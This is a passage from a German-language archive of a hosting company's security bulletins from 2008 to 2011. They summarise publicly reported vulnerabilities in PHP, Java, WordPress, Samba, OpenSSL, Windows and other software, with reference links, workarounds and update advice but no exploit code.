[3] http://www.heise.de/security/meldung/Finger-weg-von-PHP-5-3-7-1328482.html
[4] http://www.heise.de/newsticker/meldung/PHP-5-3-8-beseitigt-Fehler-bei-Hash-Operationen-1329735.html
[5] https://www.datenschutzzentrum.de/presse/20110819-facebook.htm
[6] http://www.heise.de/newsticker/meldung/Facebooks-Like-Button-im-Visier-deutscher-Datenschuetzer-1326346.html




Security Bulletin # 11.03 Java 7 buggy

2011.07.27

2011-07-27

Inhalt:
:: Java 7-Compiler enthält Defekte im Optimierer



Der Hotspot-Compiler im gerade freigegebenen Java 7 enthält Defekte im Optimierer, die zu fehlerhaften Schleifen führen können. Darauf weist die Apache Software Foundation hin. Folgen könnten sowohl Abstürze der Java Virtual Machine als auch fehlerhafte Resultate von Berechnungen sein.[1]

[1] http://www.heise.de/ix/meldung/Java-7-legt-Lucene-und-Solr-lahm-1288143.html




Security Bulletin # 11.02 Backdoor in Wordpress-Modulen

2011.06.23

2011-06-23

Inhalt:
:: Backdoor in verschiedenen Wordpress-Plugins gefunden

Die WordPress-Entwickler haben in den populäre Wordpress-Plugins AddThis, WPtouch und W3 Total Cache Backdoors entdeckt[1], mit der wahrscheinlich Zugriffe auf die WP-Installation und den Server möglich sind.

Es wird empfohlen, alle Wordpress-Installationen, die o.a. Plugins benutzen, auf das Vorhandensein von Backdoors zu überprüfen.

[1] https://wordpress.org/news/2011/06/passwords-reset/




Security Bulletin # 11.01 JAVA/PHP/Wordpress/ Facebook/iPhone

2011.02.10

2011-02-10

Inhalt
:: Lücke in PHP verursacht Webserver-DOS
:: Lücke in JAVA verursacht DOS
:: diverse Lücken in Wordpress/Drupal/Magento EE beseitigt
:: Facebook + https (hust*hust)
:: iPhone-Daten können ausgelesen werden


Ende Dezember wurde eine PHP-Lücke bekannt[1], die bei Webservern auf einem 32-bit-OS zu einem DOS des kompletten Betriebssystems führen kann[2][3]. Auf Stackoverflow sind Workarounds für diese Lücke erschienen[4][5].
MARE system-Kunden sind von diesem Bug nicht betroffen.




Ein ähnlicher Bug wurde Anfang Februar in aktuellen Java-Versionen publiziert[6], der aktuelle Versionen von Tomcat/JBOSS etc zum Absturz bringen kann. Der Bug ist zwar mittlerweile von Oracle gefixt[7], wann dieser Fix allerdings durch die Distributionen verteilt wird ist ungewiss[8].




Wordpress hat ein Sicherheitsupdate (3.0.5) veröffentlich[9][10], mit dem mehrere Lücken geschlossen werden.
In Drupal sind mehrere XSS- und SQL-Injections-Lücken bekannt geworden[11], mit denen sich in administrativer Zugriff auf die Drupal-Installation erlangen lässt.
Für Magento EE ist ein Zero-Dey-Exploit im Umlauf[12], mit dem Usersessions manipuliert und damit u.U. Kreditkarteninformationen entwendet werden können.


Facebook hat die Option eingeführt, die Webapplikation via SSL-Verschlüsselung zu nutzen; ein Bug/Feature kann dazu führen, das diese Option komplett deaktiviert wird[13].




IPhone-Nutzer sollten keine sensitiven Daten wie Zugänge oder Passwörter auf dem iPhone speichern, da diese Daten u.U. bei Verlust ausgelesen werden können[14].


[1] http://bugs.php.net/bug.php?id=53632
[2] http://www.theregister.co.uk/2011/01/04/weird_php_dos_vuln/
[3] http://www.heise.de/security/meldung/PHP-5-3-5-5-2-17-Floating-Point-Bug-behoben-1164801.html
[4] http://stackoverflow.com/questions/4610651/any-problems-with-the-following-work-around-for-php-bug-53632
[5] http://stackoverflow.com/questions/4605590/php-float-bug-php-hangs-on-numeric-value
[6] http://www.heise.de/security/meldung/Oracle-warnt-vor-Java-Schwachstelle-1185967.html
[7] http://www.theregister.co.uk/2011/02/09/java_floating_point_bug_fixed/
[8] http://isc.sans.edu/diary.html?storyid=10393&rss
[9] http://wordpress.org/news/2011/02/wordpress-3-0-5/
[10] http://isc.sans.edu/diary.html?storyid=10387&rss
[11] http://drupal.org/node/1056470
[12] http://seclists.org/fulldisclosure/2011/Feb/123
[13] http://www.heise.de/security/meldung/Facebooks-kruder-https-Workaround-1184610.html
[14] http://www.heise.de/security/meldung/iPhone-verloren-Passwoerter-weg-1186267.html




Security Bulletin # 10.06 Kritische Sicherheitslücke im Ad-Server OpenX

2010.09.14

2010-09-14

Inhalt:
:: Kritische Sicherheitslücke im Ad-Server OpenX

Seit gestern ist eine Lücke im Ad-Server OpenX bekannt[1], die es Angreifern erlaubt, beliebige Dateien hochzuladen und mit Webserver-Rechten auszuführen.

Seit heute sind erste[3] Berichte[4] bekannt, das diese Lücke aktiv ausgenutzt wird. um darüber in Webserver einzudringen[5]; u.a. bei PirateBay[6].

Eine Empfehlung, wie das Problem zu umgehen ist gibt es unter [7].

MARE system Hosting-Kunden, die das Security-Paket verwenden sind durch den Einsatz eines Intrusion Detection Systems vor dieser Lücke geschützt[2].




[1] http://www.kreativrauschen.de/blog/2010/09/09/kritische-sicherheitsluecke-in-openx-2-8-6-open-flash-chart-2/
[2] http://lists.emergingthreats.net/pipermail/emerging-sigs/2010-September/009130.html
[3] http://www.heise.de/security/meldung/Webseiten-verteilen-Malware-ueber-gehackte-OpenX-Server-1078897.html
[4] http://www.afterdawn.com/news/article.cfm/2010/09/12/vulnerability_in_openx_
advertisement_server_afterdawn_s_ads_affected_as_well
[5] http://www.esarcasm.com/17960/no-esarcasm-is-not-a-tool-of-satan-or-malware-authors/
[6] http://www.thinq.co.uk/2010/9/13/pirate-bay-cracked-spread-malware/
[7] http://www.heise.de/security/meldung/Ein-Jahr-alte-Luecke-gefaehrdet-OpenX-Ad-Server-1077941.html




Security Bulletin # 10.05 - Kritische Lücke in allen Windows-Versionen

2010.07.19

2010-07-19

Inhalt: Kritische Windows-Lücke bei der Verarbeitung von LNK-Dateien

Am Donnerstag berichtete das US-CERT[1] über eine schwere Lücke im Windows-Betriebssystem. Durch einen Fehler in der Verarbeitung von Verknüpfungen (.lnk-Dateien) startet ohne weiteres Zutun des Anwenders Schadcode, allein durch Anzeige des dazugehörigen Icons etwa im Windows Explorer.
Die Lücke betrifft alle Windows-Versionen seit Windows XP, auch die Serverversionen; wann Microsoft einen Patch zur Verfügung stellen wird, ist momentan nicht bekannt.
Microsoft hat die Lücke mittlerweile bestätigt und einen ersten Workaround veröffentlicht[3], auch das SANS ISC gibt Workaround-Empfehlungen[2].
Laut Heise wird die Lücke von Trojanern/Malware aktiv ausgenutzt, Antivirensoftware ist bei dieser Art der Lücke quasi chancenlos.




[1] http://www.us-cert.gov/current/index.html#microsoft_windows_lnk_vulnerability
[2] http://isc.sans.edu/diary.html?storyid=9181
[3] http://www.microsoft.com/technet/security/advisory/2286198.mspx
[4] http://www.heise.de/security/meldung/Neue-Windows-Luecke-schlaegt-weitere-Wellen-1039763.html




Security Bulletin # 10.04 / Facebook, SSL - Server + Client DOS

2010.03.29

2010-03-29

Inhalt:
:: SSL - Server und Client - DOS
:: Facebook will Nutzerdaten automatisch weitergeben



Präparierte TLS-Pakete können einen OpenSSL-Server oder -Client zum Absturz bringen. Ursache ist ein Fehler in der Funktion ssl3_get_record() zur Verarbeitung von SSL-Records. In SSL-Records werden die Daten zwischen den Endpunkten übertragen. Falsch formatierte Records führen laut Bericht der OpenSSL-Entwickler zu einem Speicherzugriffsfehler.[1][2]
Anwender des aktuellen Debian/Stable sind nicht betroffen[3], der Fehler tritt in den OpenSSL-Versionen 0.9.8f bis 0.9.8m auf.


[1] http://openssl.org/news/secadv_20100324.txt
[2] http://www.heise.de/security/meldung/Record-of-Death-legt-OpenSSL-Server-lahm-965773.html
[3] http://security-tracker.debian.org/tracker/CVE-2010-0740


Facebook will Nutzerdaten automatisch weitergeben

In einem Vorschlag zur Neufassung seiner Datenschutzregeln kündigt Facebook an, Kundendaten an "überprüfte" (pre-approved) Websites und Anwendungen Dritter weiterzuleiten. Dazu sei das Unternehmen "gezwungen", um seinen Nutzern "die Möglichkeit zu geben, auch außerhalb von Facebook nützliche Erfahrungen im sozialen Bereich machen zu können." Die "betreffenden Webseiten und Anwendungen (müssen), ein Zulassungsverfahren ... durchlaufen" und gesonderte Vereinbarungen zum Schutz der Privatsphäre unterzeichnen. [4]



[4] http://www.heise.de/newsticker/meldung/Facebook-will-Nutzerdaten-automatisch-weitergeben-965524.html




Security Bulletin # 10.03 / Spamassassin Milter-Plugin Remote Code Execution

2010.03.16

2010-03-16

Inhalt:
:: Spamassassin Milter-Plugin Remote Code Execution

Im Milter-Plugin des vielfach eingesetzten Spam-Filters Spamassassin wurde ein kritische Sicherheitslücke entdeckt, mit der ein Angreifer beliebige Befehle mit den Rechten des Mailservers/Spamfilters ausführen kann[1]. Dazu wird eine besonders formatierte Mail an den Mailserver gesandt, die beim Filtern die versteckten Befehle ausführt.

Es sind bereits Berichte aufgetaucht, das die Lücke aktiv ausgenutzt wird[2], der Entdecker der Lücke hat einen Exploit dazu veröffentlicht[3].


Unter [4] stellen wir weitere Infos, Workarounds und ein Testscript zum Mailservertest zur Verfügung.



[1] http://seclists.org/fulldisclosure/2010/Mar/140

[2] http://isc.sans.org/diary.html?storyid=8434

[3] http://seclists.org/fulldisclosure/2010/Mar/264

[4] http://dogtown.mare-system.de/doku.php?id=research:updates:secbulletin1003-spamassassin_milter




Security Bulletin # 10.02 / Probleme nach Microsoft-Update / XP-Crash und BSOD

2010.02.16

2010-02-15

Inhalt:
:: Probleme nach Microsoft-Update / XP-Crash und BSOD

Nach dem Mega-Patchday[4][5] vom letzten Dienstag, vom ISC sinnigerweise als "Black Tuesday" beschrieben[1], haben einige Microsoft-Workstations unter XP mit dem Blue Screen of Death (BSOD) zu kämpfen[2][3][7].
Grund ist anscheinend eine fehlerhafte Treiberdatei, momentan mehren sich die Stimmen[2][6], das dieses Problem durch eine Rootkit-Infizierung der betreffenden Clients entsteht.


Weitere Updates: Research@Dogtown


Links:
[1] - http://isc.sans.org/diary.html?storyid=8197
[2] - http://isc.sans.org/diary.html?storyid=8209
[3] - http://isc.sans.org/diary.html?storyid=8215
[4] - http://www.microsoft.com/technet/security/bulletin/ms10-feb.mspx
[5] - http://www.heise.de/security/meldung/Weiterhin-Luecken-trotz-Microsofts-Riesen-Patch-Serie-Update-926161.html
[6] - http://www.golem.de/1002/73115-rss.html
[7] - http://www.heise.de/security/meldung/Sicherheits-Update-von-Microsoft-fuehrt-zu-Bluescreen-928926.html




Security Bulletin # 10.01 / Samba-Lücke ermöglicht Auslesen beliebiger Dateien

2010.02.09

2010-02-07

Inhalt
:: Lücke im Fileserver Samba ermöglicht Auslesen beliebiger Dateien

Auf der Mailinglist Fulldisclosure wurde ein Exploit gezeigt und veröffentlicht, der es einem entfernen Angreifer ermöglicht, beliebige Dateien auf dem Server auszulesen[1][2]. Benötigt wird dafür entweder ein Account auf dem Samba-Server oder ein Samba-Share mit Gastzugang und Schreibzugriff.

Das Samba-Team hat ein Advisory veröffentlicht[3], indem eine Möglichkeit beschrieben wird, die Lücke per smb.conf- Option zu schliessen: die Anweisung wide links = no in der Section [global] verhindert, das die Lücke ausgenutzzt werden kann. Diese Option ist in vielen Samba-Default-Installation nicht gesetzt.
Betroffen sind die aktuelle Version 3.4.5 und wahrscheinlich alle vorhergendenden Versionen.[4]




Links:
[1] http://seclists.org/fulldisclosure/2010/Feb/82
[2] http://seclists.org/fulldisclosure/2010/Feb/99
[3] http://www.samba.org/samba/news/symlink_attack.html
[4] http://www.heise.de/security/meldung/Schwachstelle-in-Samba-ermoeglicht-Zugriff-auf-Dateien-Update-924142.html




Security Bulletin # 09.11 / 1und1 - ungepatchter Installationskernel in Suse-11-Rootserverinstallation

2009.11.25

2009-11-25



Inhalt:
:: 1und1 - ungepatchter Installationskernel in Suse-11-Rootserverinstallation

Der Hoster 1&1 installiert auf Rootservern mit Suse-11 eigene Kernel, für die keine Updates via Yast-Online/Autoupdate eingeflegt werden können.[1]

Kernelupdates erfolgen nur, wenn die Betreiber der Rootserver manuell entweder neue Kernelimages von update.onlinehome-server.info herunterladen und via Yast installieren, eigene Kernel kompilieren oder den Suse-Standardkernel installieren.

Auf Nachfrage von heise wird 1und1 die Dokumentationen
überarbeiten und deutlicher auf den Sonderfall bei openSuse 11 sowie auf den Fundort für aktuelle Kernel-Dateien hinweisen.[2]

Updates und weitere Infos zu dieser Meldung gibt es unter [3]


[1] http://dogtown.mare-system.de/doku.php?id=research:advisories:2009-1und1-kernel
[2] http://www.heise.de/security/meldung/openSuse-Kernel-auf-1-1-Root-Servern-moeglicherweise-veraltet-869583.html
[3] http://dogtown.mare-system.de/doku.php?id=research:updates:secbulletin0911-1und1_kernel




Security Bulletin # 09.10 / Schwachstelle im SSL/TLS-Protokoll macht MITM-Attacken möglich **UPDATE**

2009.11.16

     2009-11-16



Inhalt:
:: Schwachstelle im SSL/TLS-Protokoll macht MITM-Attacken und Ausspähen von Daten möglich

Am 4.11. veröffentlichten Marsh Ray und Steve Dispensa ein Dokument[1], in dem eine Designschwachstelle des Verschlüsselungsprotokolls SSL/TLS beschrieben wurde, mit der Man in The Middle - Attacken und damit das Ausspähen sensitiver Daten möglich sind[2][3]. Eine bildhafte Erklärung zu dieser Schwachstelle liefert Theirry Zoller in seinem Blog[4]

Am 6.11. lieferte das OpenSSL-Projekt einen Fix (0.9.8l), der aber nicht die Schwachstelle behebt sondern einige Protokoll-Features abschaltet[5][6][7].

Serverbetreibern, die mit SSL und Client-Zertifikaten arbeiten, ist dringlichst anzuraten, die in den Distributionen verfügbaren Patches[7] ausgiebig mit Clientanwendungen zu testen, bevor die Sicherheitspatches auf Produktivsystemen ausgerollt werden.


weitere Updates





[1] http://extendedsubset.com/?p=8
[2] http://www.heise.de/security/meldung/Schwachstelle-im-SSL-TLS-Protokoll-851104.html
[3] http://www.heise.de/security/meldung/Passwortklau-durch-Schwachstelle-im-SSL-TLS-Protokoll-860067.html
[4] http://blog.g-sec.lu/2009/11/tls-sslv3-renegotiation-vulnerability.html
[5] http://isc.sans.org/diary.html?storyid=7543
[6] http://www.heise.de/security/meldung/OpenSSL-fixt-TLS-Schwachstelle-853177.html
[7] http://seclists.org/bugtraq/2009/Nov/113

[8] http://blog.ivanristic.com/2009/11/initial-test-for-ssl-renegotiation-added-to-ssl-labs.html




Security Bulletin # 09.9 / Linux-Kernelbugs / Windows Server 2008R2 Remote Crash **UPDATE**

2009.11.12

  2009-11-12



Inhalt:

:: Linux Kernel Null-Pointer Dereference Bugs
:: Windows Server 2008R2 Remote Kernel Crash / Remote Code Execution


Die in letzter Zeit[1] publizierten Null-Pointer Dereference Bugs im Linux-Kernel, die zu Abstürzen von Diensten oder zu Rootrechten führen können[2] und für die auch schon Exploits zur Verfügung stehen[3], lassen sich, so man eine aktuelle Version einsetzt, recht einfach umgehen, indem man ein Kernel-Feature (mmap_min_addr) nutzt, dessen Werte einfach auf der Kommandozeile gesetzt werden können. Eine ausführlich Anleitung dazu und Infos zu betroffenen Distributionen gibt der Link unter[4].



Laurent Gaffié hat in seinem Blog[5] eine kritische Sicherheitslücke im Windows Server 2008R2 veröffentlich, die zum kompletten Einfrieren des Servers führt. Ein Patch ist noch nicht verfügbar.


Update 2009-11-13

Microsoft hat ein Advisory[6] zu dem Problem veröffentlicht, in dem zwar bestätigt wird, das Microsoft ein Problem untersucht, ausser Beschwichtigungen aber keine Infos weiteren zu finden sind. Indirekt wird aber die Existenz einer Sicherheitslüücke zugegeben: "Microsoft is investigating new public reports of a possible denial of service vulnerability in the Server Message Block (SMB) protocol. ... However, Microsoft is aware that detailed exploit code has been published for the vulnerability."
In den weiter unten zu findenden Q&A ist dann aber doch von einem Problem die Rede:


Das Internet Strom Center hat einen FAQ/Artikel[7] mit umfangreichen Informationen zur Lücke, zum Exploit und betroffenen Windows-Versionen online gestellt, der regelmäßig mit neuen Infos versehen wird.



[1] http://www.mare-system.de/sic/index.cgi?search=linux%25kernel%25null%25pointer%25dereference
[2] http://lwn.net/Articles/347006/
[3] http://www.securityfocus.com/bid/36038
[4] how to avoid that nasty nullpointer dereference bugs in linux kernel


[5] http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html

[6] http://www.microsoft.com/technet/security/advisory/977544.mspx
[7] http://isc.sans.org/diary.html?storyid=7573




Security Bulletin # 09.8 - Snort / Emerging Threats Ruleset Change Fri 2009-10-02

2009.09.29

Inhalt:

:: Umbenennung der Emerging-Threats-Regelsätze



Am Freitag, den 2. Oktober 05:01 MESZ [00:01 EST (GMT +5)] werden einige Dateien aus den ET-Regelsätzen umbenannt, vor allem die Bereiche WEB und VIRUS/MALWARE werden neu zusammengefasst. Weitere Infos geben die unten stehende Email, die offizielle Ankündigung auf der ET-Webseite [1] und die Diskussion auf der emerging-sigs-mailingliste [2]

[1] http://emergingthreats.net/index.php/component/content/article/17-sigs/203-rule-file-change-coming.html
[2] http://lists.emergingthreats.net/pipermail/emerging-sigs/2009-September/003866.html

-------- Original Message -------- Subject: [Emerging-Sigs] Rule Change Official Notice Date: Fri, 25 Sep 2009 15:25:45 -0400 From: Matt Jonkman jonkman@jonkmans.com To: Emerging Threats Signatures emerging-sigs@emergingthreats.net

WE'RE MAKING A CHANGE TO THE ORGANIZATION OF THE RULESET!! YOU WILL HAVE TO UPDATE YOUR CONFIG!!!

Trying to get everyone's attention. Are you here now? Thanks for taking a minute to read this. You'll be glad you did.

We are just about to cross signature ID 2010000, that's ten thousand signatures come and gone (we have about 7,500 active at the moment). There are a few categories that have bloated and some more granular organization will be of a benefit to all of us. So we're going to take this opportunity to do the following. These changes will come into effect at 00:01EST (GMT + 5) October 2, 2009. That's just under one week from now. So please be prepared, you'll have to update your snort configuration to keep using the same rules, they'll be in different files.

  1. Rules in CURRENT_EVENTS currently drop into emerging.rules. We will no longer do this, and add the file emerging-current_events.rules.

  2. The WEB category will be subdivided and the WEB_SPECIFIC will be renamed. This is for easier disabling or enabling of client and server based rules. The new files will be:

emerging-web_client.rules

These will be the activex and other browser and client exploits.

emerging-web_server.rules

Attacks on web servers.

emerging-web_specific_apps.rules

These will be most of the rules formerly known as web_sql_injection.

emerging-web.rules

The remaining rules that do not fit cleanly into the above categories will go here.

  1. The rules currently in malware for user agents will be moved into their own rules category. Primarily because of the number of signatures we have here. They will now be in the category:

emerging-user-agents.rules

We are not at this time going to subdivide the virus and trojan rules. They ought to be, but this is a bigger issue than we can tackle at the moment.

Again, these changes will go into effect at 00:01EST (GMT + 5) October 2, 2009!

Thanks for using and contributing to the ET ruleset. Comments about the change are welcome!

Matt


Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org


PGP: http://www.jonkmans.com/mattjonkman.asc


Emerging-sigs mailing list Emerging-sigs@emergingthreats.net http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs




Security Bulletin # 09.7 - Kritische Lücke im allen Linux-Kerneln seit 2.4

2009.08.14

2009-08-13

Tavis Ormandy und Julien Tinnes vom Google Security Team haben eine kritische Lücke im Linux Kernel entdeckt[1][2], die es lokalen Angreifern ermöglicht Rootrechte zu erlangen. Diese Lücke betrifft alle Kernelversionen seit 2001 / Kernel 2.4.4.

Die Lücke ist trivial ausnutzbar, Exploits sind bereits im Umlauf, es wird aber ein lokaler Account benötigt. Kurze Tests auf Debian/SuSE/SLES/RHEL zeigten, das anscheinend alle Systeme verwundbar sind.

Die notwendigen Korrekturen, um die Sicherheitslücke zu schliessen, sind bereits im Linux-Kernel-Sourcetree eingecheckt,man kann erwarten, das im Laufe des Tages Patches für die Distributionen verfügbar sind.

[1] http://lwn.net/Articles/347006/
[2] http://seclists.org/fulldisclosure/2009/Aug/0173.html




Security-Bulletin # 09.6 Microsoft warnt vor kritischer Sicherheitslücke in ActiveX

2009.07.08

2009-07-08

Inhalt:

  • kritische Sicherheitslücke in ActiveX


Microsoft warnt in einem aktuelle Security-Advisory vor einer kritischen Sicherheitslücke im eigenen Video-ActiveX-Control. Die Lücke lässt sich über den Internetexplorer ausnutzen; Angreifer können die Kontrolle von Windows-Systemen übernehmen. Die Sicherheitslücke wird bereits aktiv ausgenutzt.[1][2][3]

Nach Angaben des Internet Storm Centers wird die Lücke bereits aktiv ausgenutzt und viele gehackte Webserver sind mit entsprechender Malware infiziert; eine laufend aktualisierte Liste wird bereitgestellt [4], des weiteren ein Advisory, wie die Domains via DNS gesperrt werden können.[5]

Durch die vor kurzem bekanntgewordene Lücke im FCKeditor (siehe Security Bulletin 09.5 [9]), der in vielen großen Projekten (Adobe ColdFusion, Oracle Application Express, Drupal, Zope, Wikimedia) verwendet wird, ist damit zu rechnen, dass in kurzer Zeit weitere Websites gehackt und mit schadhafter Software infiziert werden, um darüber dann die Windows-Rechner zu infizieren.

Microsoft hat aufgrund der kritischen Lage[6] einen Hotfix incl. Anleitung bereitgestellt, bisher nur in englisch.[7][8]

Als schnellsten Workaround bietet sich an, auf einen alternativen Browser (Firefox, Opera) umzusteigen; unter [10] befindet sich ein Download-Link für einen aktuellen portablen Firefox-Browser.





[1] http://www.microsoft.com/technet/security/advisory/972890.mspx
[2] http://www.heise.de/security/Webseiten-infizieren-Windows-PCs-ueber-neue-DirectShow-Luecke--/news/meldung/141616
[3] http://www.securityfocus.com/brief/984
[4] http://isc.sans.org/diary.html?storyid=6739&rss
[5] http://www.malwaredomains.com/bhdns.html
[6] http://isc.sans.org/diary.html?storyid=6745&rss
[7] http://www.heise.de/security/Schnell-Fix-von-Microsoft-fuer-kritische-DirectShow-Luecke--/news/meldung/141656
[8] http://support.microsoft.com/kb/972890
[9] http://www.mare-system.de/index.cgi?p=news&n=secbulletin
[10] http://www.mare-system.de/index.cgi?p=produkte#software




Security-Bulletin # 09.5 / Lücke in ColdFusion/FCKeditor / Nagios2/3

2009.07.06

2009-07-06

Inhalt:

  • kritische Lücke im FCKEditor / ColdFusion
  • Sicherheitslücke in Nagios2/Nagios3
  • in eigener Sache: Security Information Center



Seit einigen Tagen gibt es Meldungen über Einbrüche in Websites auf Basis von Adobes Applicationservers ColdFusion[1], bei denen Unbekannte eine Lücke im enthaltenen FCKEditor ausnutzten, um Inhalte zu manipulieren.[2] Nach Angaben des ISC soll es auch möglich sein, den kompletten Server zu übernehmen und alle Daten auszulesen oder zu manipulieren.

Die Autoren von FCKEditor haben mittlerweile ein Update[3] auf Version 2.6.4.1 für den Editor herausgebracht, das die Lücke im Editor schliessen soll. Der WYSIWYG-HTML-Editor wird u.a. in Wikimedia-Editionen, Oracle Application Express, Zope, Drupal genutzt wird; eine Übersicht, in welchen Produkten der Editor verwendet wird, gibt [4].




Die Monitoring-Software Nagios ist in den Version 2 und 3 anfällig für eine Sicherheitslücke[5], die authentifizierte Benutzer ausnutzen können, um über das Script statuswml.cgi beliegibe Kommandos mit den Rechten des Apache-Users auf dem Server auszuführen. Debian[6], Redhat[7] und Ubuntu[8] haben bereits die Pakete für Nagios2/Nagios3 aktualisiert.




in eigener Sache:

MARE system gibt das Security Information Center (SIC) für eine erste öffentliche Testphase frei. [9]
Das SIC ist die Schnittstelle zu einem RDF/RSS/ATOM-Newsfeed-Scanner, der über 20 sicherheitsorientierte RDF-News-Streams alle 10 Minuten nach neuen Nachrichten durchsucht und die jeweiligen News via SIC-Webinterface darstellt oder per Email versendet.
Interessierte können verschiedene News-Streams abonnieren und erhalten bei Updates Benachrichtigungen per EMail. Der Dienst wird vorläufig nur auf englisch angeboten.




[1] http://isc.sans.org/diary.html?storyid=6715
[2] http://www.heise.de/security/Luecke-in-ColdFusion-8-gefaehrdet-Sicherheit-von-Websites--/news/meldung/141633
[3] http://www.fckeditor.net/download
[4] http://www.fckeditor.net/whosusing
[5] http://www.securityfocus.com/bid/35464
[6] http://www.debian.org/security/2009/dsa-1825
[7] http://rhn.redhat.com/errata/RHSA-2009-1141.html
[8] http://www.ubuntu.com/usn/USN-795-1
[9] http://www.mare-system.de/sic.cgi




Security Bulletin # 09.4 - Webserver Easy HTTP-DOS

2009.06.22

2006-06-22

Inhalt: Webserver Easy HTTP-DOS

Im Internet ist ein Tool Namens Slowloris aufgetaucht[1], mit dem man Apache-Webserver, die sich nicht hinter einem Loadbalancer oder einer Web-Application-Firewall befinden, von jedem normalen PC aus lahmlegen kann.
Im Moment gibt es, ausser Loadbalancing und Einsatz von WAFs, keine Möglichkeiten, sich gegen Angriffe dieser Art zu schützen.
Betroffen sind folgende Webserver (die Liste stammt von [1]):

  • Apache 1.x
  • Apache 2.x
  • dhttpd
  • GoAhead WebServer
  • Squid

Nicht betroffen sind:
  • IIS6.0
  • IIS7.0
  • lighttpd
  • nginx
  • Cherokee


[1] http://ha.ckers.org/slowloris/

[2] References:

  • http://www.heise.de/security/Remote-Handbremse-fuer-Webserver--/news/meldung/140678
  • http://isc.sans.org/diary.html?storyid=6601
  • http://seclists.org/fulldisclosure/2009/Jun/0207.html




Security Bulletin #3 / 2009 -Remote Exploit und Buffer-Overflow im NTPD

2009.05.19

2009-05-19


Inhalt:
- Remote Exploit und Buffer-Overflow im NTPD

US-CERT hat ein Security-Advisory für den Network Time Protokol Daemon veröffentlicht [1], in dem ein Remote ausnutzbarer Buffer-Overflow beschrieben wird. Damit ist es für entfernte Angreifer möglich, den Dienst zu kompromittieren, schadhaften Code auf dem System auszuführen und ggfs in das System einzudringen. Heise-Security hat einen entsprechenden Artikel dazu veröffentlicht [2]

Benutzer von SuSE/SLES-Linux sollten Ihre Systeme überprüfen, da dort der ntpd per default installiert und aktiviert wird.

[1] http://www.kb.cert.org/vuls/id/853097
[2] http://www.heise.de/security/Buffer-Overflow-in-Zeit-Protokolldienst-ntpd--/news/meldung/138115




Security Bulletin # 2 / 2009 - IE führt Code in Bildern aus

2009.02.11

Security Bulletin # 2 / 2009
2009-02-11


Inhalt:

- Internet Explorer führt Code in Bildern aus

Wenn man ein Bild im Internet Explorer öffnet, kann es gut sein, dass dieser zu der Auffassung gelangt, dass es sich dabei eigentlich um HTML-Code handelt und sogar eingebettete Scripte ausführt. Gefährdet sind vor allem die Besucher von Web-Seiten, bei denen Benutzer selbst Bilder hochladen können.
http://www.heise.de/newsticker/Internet-Explorer-fuehrt-Code-in-Bildern-aus--/meldung/132289





Security Bulletin # 1 / 2009 - PostgreSQL

2009.02.10


2009-02-10


Inhalt:

- Neue PostgreSQL-Versionen beheben kritische Fehler

Für alle PostgreSQL-Versionen ab 7.4 haben die Entwickler der freien Datenbank Updates zur Verfügung gestellt. Sie beheben kritische Fehler in Version 8.1 und 8.3. Deshalb sollten Anwender dieser beiden Varianten ihr System so schnell wie möglich aktualisieren.

Link :: http://www.heise.de/newsticker/Neue-PostgreSQL-Versionen-beheben-kritische-Fehler--/meldung/127149




Security Bulletin # 6 / 2008 - DDOS auf InternetX

2008.11.22

Security Bulletin #6 / 2008
2008-11-22


Inhalt:

- DDoS Angriffe auf InternetX


Zahlreiche deutsche Webseiten (darunter von Schlund gehostete Seiten) sind derzeit schwer oder gar nicht zu erreichen, da die Nameserver des Registrars und Hosters InternetX einem Distributed-Denial-of-Service-Angriff (DDoS) ausgesetzt sind. Dadurch ist die Namensauflösung sowohl der Kundendomains als auch die des InternetX-Webauftritts gestört.
Laut InternetX sind insbesondere der Nameserver 62.116.129.129 und diverse virtuelle Nameserver Ziel der Attacke. An einer Entstörung wird nach Angaben des Domain-Supports gearbeitet. InternetX bittet die Unannehmlichkeiten zu entschuldigen.

http://www.heise.de/newsticker/DDoS-Attacke-auf-InternetX-Update--/meldung/119274




Security Bulletin # 5 / 2008 - Windows 2003/2008/XP RPC-Probleme

2008.10.24

Security Bulletin #5 / 2008
2008-10-24


Inhalt:
- Kritische Lücke in Windows 2000/XP/Vista & Windows Server 2000/2003/2008

Microsoft hat ein Sicherheits-Update für eine kritische Lücke außerhalb der Reihe veröffentlicht. Bei der Lücke handelt es sich um einen Fehler im RPC-Dienst, der sich laut Fehlerbericht ausnutzen lässt, um Code über das Netz in ein System zu schleusen und auszuführen. Dazu genügen präparierte RPC-Requests, für deren Verarbeitung ein Angreifer sich unter Windows 2000, XP und Server 2003 nicht einmal beim Zielsystem authentifizieren muss.
Microsoft empfiehlt allen Anwendern, das Update so schnell wie möglich zu installieren. Außer bei Windows 2000 erhalten alle Microsoft-Betriebssysteme das Update automatisch.
Wir empfehlen, nach dem Debakeln im Microsoft-Update-Dienst der letzten Zeit, und vor allem bei Firewall-geschützten Systemen, noch mindestens einen Tag mit dem Update zu warten.

Weitere Infos zu dem Problem: - http://www.heise.de/security/Microsoft-patcht-kritische-Luecke-im-RPC-Dienst--/news/meldung/117867
- http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx




Security Bulletin # 3 / 2008 - Massenhacks von Webseiten

2008.05.28

Security Bulletin # 3 / 2008
2008-05-30


Inhalt:
- Massenhacks von Webseiten

Heise berichtet erneut von Massenhacks mittels SQL-Injections, diesmal hauptsächlich auf deutsche Webseiten. Betroffen sind vor allem auf Microsofts IIS und ASP aufsetzende Webserver in Verbindung mit dem CMS "InterLogics CMS professional".

Wir stellen für Administratoren auf Anfrage ein Tool bereit, um htdocs_Verzeichnisse und SQL-Dumps auf eventuelle Kompromittierungen durch vergangene und aktuelle SQL-Injections zu untersuchen. Alternativ kann die Google-Suche oder Goolag zum Aufspüren von Sicherheitslücken benutzt werden.

heise-link




Security Bulletin # 2 / 2008 - SQL-Injections

2008.05.23

Security Bulletin # 2 / 2008
2008-05-23

Inhalt
- Massenhacks von Webseiten
- Mailserver-Probleme durch SPAM-Rückläufer

In den letzten Tagen/Wochen wurde wiederholt von Massenhacks auf Webseiten berichtet, auf denen vor allem CMS oder Forensoftware läuft; immer wieder in den Nachrichten finden sich die Software Joomla und phpBB. Wer diese Software einsetzt sollte dringend auf die aktuellen Versionen updaten.

heise-link 1

heise-link 2

heise-link 3


--

